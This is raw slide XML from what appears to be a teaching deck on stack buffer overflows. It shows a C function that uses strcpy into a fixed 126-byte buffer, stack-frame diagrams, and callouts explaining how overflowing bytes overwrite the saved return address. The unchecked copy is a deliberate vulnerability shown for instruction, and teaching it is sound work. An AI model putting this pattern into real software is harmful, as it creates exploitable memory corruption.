              <a:gd name="T3" fmla="*/ 2147483647 h 644"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2025"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 644"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2025"/>
              <a:gd name="T7" fmla="*/ 0 h 644"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2025"/>
              <a:gd name="T13" fmla="*/ 0 h 644"/>
              <a:gd name="T14" fmla="*/ 2025 w 2025"/>
              <a:gd name="T15" fmla="*/ 644 h 6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5" h="644">
                <a:moveTo>
                  <a:pt x="0" y="527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="543"/>
                  <a:pt x="761" y="644"/>
                  <a:pt x="1074" y="623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387" y="602"/>
                  <a:pt x="1727" y="504"/>
                  <a:pt x="1876" y="400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2025" y="296"/>
                  <a:pt x="1947" y="83"/>
                  <a:pt x="1966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05A2FD-A018-A747-B549-F7C1B1F8AE25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8081963" y="613957"/>
            <a:ext cx="3190874" cy="1200329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buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(char *str) {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dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[126];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dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);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dirty="0">
                <a:latin typeface="Courier" pitchFamily="2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6D919-FB0A-5F4A-B647-2614742EA2DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3794624" y="488549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Saved EIP:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2624953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6D16D7A8-1D55-EE4A-8CA7-89ACDEB8C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689" y="4379197"/>
            <a:ext cx="4349863" cy="1964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Document 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD38C7D-8312-8040-9842-A870D1F8DA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7255593" y="-91157"/>
            <a:ext cx="635200" cy="5618116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" name="Document 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4872708" y="-91157"/>
            <a:ext cx="635200" cy="5618116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7981950" y="2400300"/>
            <a:ext cx="800100" cy="6286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main local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vars</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/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8839200" y="2000250"/>
            <a:ext cx="0" cy="4000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95450" y="3200401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Low memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>addresses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419440" y="3176144"/>
            <a:ext cx="1402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High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>addresses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97127" y="1543051"/>
            <a:ext cx="1931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base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(EBP)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010651" y="2571751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7C4670-DC65-B543-B54B-DDFC859D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 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meet.c</a:t>
            </a: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4FB3AFA-D485-814C-9EDA-DF921D15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726" y="4286251"/>
            <a:ext cx="4482275" cy="942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A4FCA310-4EAD-1D4C-8136-7E5E4EC95725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3181350" y="5372100"/>
            <a:ext cx="400050" cy="628650"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3055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852A2-2846-6F44-8746-AA7B94075882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740672" y="5429250"/>
            <a:ext cx="1440678" cy="5143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Pushing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[1] onto stack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DF3318-7526-5F47-8C1E-A1FA2EB709A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7233610" y="3057526"/>
            <a:ext cx="5390" cy="4286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F1E4A52-1BE1-5147-AD7D-25F427F94C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181850" y="2400300"/>
            <a:ext cx="800100" cy="6286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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[1]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AD1463-C454-5D4B-9A0F-D3AD13AAF129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7258618" y="3437754"/>
            <a:ext cx="1481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pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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B5CC00-A75D-434C-97C4-3527F8224269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438901" y="2400300"/>
            <a:ext cx="735783" cy="6286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main EIP + 5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88F928-4D08-9F44-839A-7B3B5D669089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695952" y="2400300"/>
            <a:ext cx="742949" cy="6286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main EBP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1D2568-00CE-9249-A82E-0B3FB0A1C988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541666" y="2400300"/>
            <a:ext cx="2154285" cy="6286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greeting local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> name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FBEC19-7D2B-6C46-A769-2ACA6BB59840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6492962" y="3068942"/>
            <a:ext cx="5390" cy="4286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74602CC-EFAA-4A4D-979F-F3FA658B9AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5990098" y="3445555"/>
            <a:ext cx="1481496" cy="646331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stack pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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25777AE3-3D0E-C144-AD42-ED7E80AC6615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067051" y="5886450"/>
            <a:ext cx="531765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eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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74E49918-268D-614B-98C2-2AF467F73F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878811" y="4586288"/>
            <a:ext cx="531765" cy="3429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eip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208D488-1EC1-654A-BD02-D8F51D5D505B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5747710" y="3086101"/>
            <a:ext cx="5390" cy="4286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66DBB90-5B42-8943-A99D-AA051B569259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4726275" y="3458069"/>
            <a:ext cx="1481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pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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474B039D-24EF-8D4D-A021-ED2902A9BD7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878811" y="4800600"/>
            <a:ext cx="531765" cy="3429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eip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C24F217-C146-8043-977A-9C39E3CF146C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5768525" y="2027799"/>
            <a:ext cx="417202" cy="35534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001E54E-37A3-6248-821A-66B32E8DAF5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153152" y="1543052"/>
            <a:ext cx="1931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base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(EBP)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D32585ED-646F-3F46-8254-49E1090ACA30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878811" y="4972050"/>
            <a:ext cx="531765" cy="3429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eip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CA5D2A-34CC-3748-8B55-FE4D40267DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3576010" y="3086101"/>
            <a:ext cx="5390" cy="4286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419EED1-3463-FD4C-A84E-73F2CF323A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2967780" y="3508027"/>
            <a:ext cx="1481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pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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B7C421-8178-4246-AB7E-A15D7203DD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656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267451" y="5834961"/>
            <a:ext cx="2857501" cy="394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622CB0-9612-7C4D-B8FA-177A5E2D5C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953251" y="5429250"/>
            <a:ext cx="336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…. (more stuff including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) …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A39ACDD2-663E-CE4C-8A83-69451E9B8337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867651" y="5772150"/>
            <a:ext cx="531765" cy="3429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5D7ADE5A-4EC5-5A43-97E0-5D34C827A4DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867651" y="6000750"/>
            <a:ext cx="531765" cy="3429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1F92F2D0-2BAC-4240-88F6-01212A407021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067051" y="6057900"/>
            <a:ext cx="531765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eip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6517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6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="19" grpId="1"/>
      <p:bldP spid="19" grpId="2"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="28" grpId="1"/>
      <p:bldP spid="28" grpId="2"/>
      <p:bldP spid="28" grpId="3"/>
      <p:bldP spid="2" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="1" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="1" animBg="1"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="33" grpId="1"/>
      <p:bldP spid="33" grpId="2"/>
      <p:bldP spid="33" grpId="3"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="1" animBg="1"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="37" grpId="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="1" animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="42" grpId="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="1" animBg="1"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="46" grpId="1" animBg="1"/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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02F0DB02-133C-1448-8025-1BD4A7584C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If Buffer Is Overstuffed?</a:t>
            </a:r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879D379F-6AC6-ED4D-84FD-82E897119B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9829800" cy="3849624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dirty="0"/>
              <a:t>Memory pointed to by str is copied onto stack…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en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(char *str) {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 dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>           char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[126];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 dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>buf,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);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 dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>If a string longer than 126 bytes is copied into buffer, it will overwrite adjacent stack locations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46284ECF-4066-1E4C-BEBD-E617D142D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8260" y="3232630"/>
            <a:ext cx="4761240" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -56625"/>
              <a:gd name="adj2" fmla="val 33880"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a: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 does NOT check whether the string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at *str contains fewer than 126 characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11270" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5844B0-4B70-B34B-AD38-7F8C072287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5051333"/>
            <a:ext cx="6705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1" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44B42D9-A216-EC41-94F7-F3FCA3D1A2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5737133"/>
            <a:ext cx="6705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2" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6DB8F0B-2134-F646-A459-3F4B45A95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084670"/>
            <a:ext cx="2286000" cy="609600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buf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11273" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2814CD95-AA6E-FE41-85B1-D88163350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876" y="5051333"/>
            <a:ext cx="746125" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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str</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11274" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73B7CEB-D361-CE43-9617-DBC27A761C59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8305800" y="5618070"/>
            <a:ext cx="152400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33333"/>
              <a:gd name="adj2" fmla="val 49995"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink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11275" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E490EAF-60F7-0F4B-8D60-CA4E04D18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6083263"/>
            <a:ext cx="5867399" cy="345201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70000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This will be interpreted as the return address!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11276" name="Rectangle 11" descr="Large checker board">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A8EF2E-A4A6-6440-BB3F-A9383B2AD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5084670"/>
            <a:ext cx="16764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overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11277" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{262D7FC5-ED0B-B84D-9D0B-646DC7F3E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5008471"/>
            <a:ext cx="685800" cy="804863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:miter lim="800000"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endParaRPr lang="en-US" altLang="en-US" sz="2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278" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B07A22-B2B4-E540-BEC0-0B2D9924C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6600" y="5084671"/>
            <a:ext cx="819968" cy="590931"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69546"/>
              <a:gd name="adj2" fmla="val -1518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Top of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stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11279" name="Rectangle 14" descr="20%">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74BF221-5BF1-4E43-8DBA-81A48F6E9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0" y="5160870"/>
            <a:ext cx="1295400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i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Frame of the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400" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>calling function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483423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6D16D7A8-1D55-EE4A-8CA7-89ACDEB8C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689" y="4360146"/>
            <a:ext cx="4349863" cy="1964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Document 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD38C7D-8312-8040-9842-A870D1F8DA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7255593" y="-110208"/>
            <a:ext cx="635200" cy="5618116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" name="Document 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4872708" y="-110208"/>
            <a:ext cx="635200" cy="5618116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7981950" y="2381249"/>
            <a:ext cx="800100" cy="6286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main local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vars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9010651" y="2552700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7C4670-DC65-B543-B54B-DDFC859D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Smashing the Stack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4FB3AFA-D485-814C-9EDA-DF921D15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726" y="4267200"/>
            <a:ext cx="4482275" cy="942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A4FCA310-4EAD-1D4C-8136-7E5E4EC95725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
